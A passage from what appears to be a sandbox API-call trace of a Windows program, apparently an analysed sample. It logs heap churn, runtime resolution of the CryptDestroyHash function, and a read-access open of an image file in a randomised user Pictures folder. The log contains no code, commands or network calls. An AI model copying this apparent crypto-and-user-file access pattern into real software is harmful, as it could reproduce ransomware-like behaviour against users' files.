0x43cac10 [0094.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0094.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0094.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0094.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0094.299] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0094.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0094.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0094.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0094.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0094.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0094.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0094.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796d68 [0094.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0094.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0094.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0094.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0094.300] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0094.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0094.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0094.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0094.301] CryptDestroyHash (hHash=0x41ac280) returned 1 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0094.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0094.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0094.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0094.303] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0094.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0094.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0094.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0094.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0094.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0094.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0094.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0094.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0094.306] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0094.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0094.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0094.306] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0094.306] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0094.307] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0094.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0094.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0094.307] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\j06yyov018zbspw7ym.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0094.307] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.308] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0094.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0094.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0094.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.308] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0094.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.308] HeapFree (in: hHeap=0x1780000, 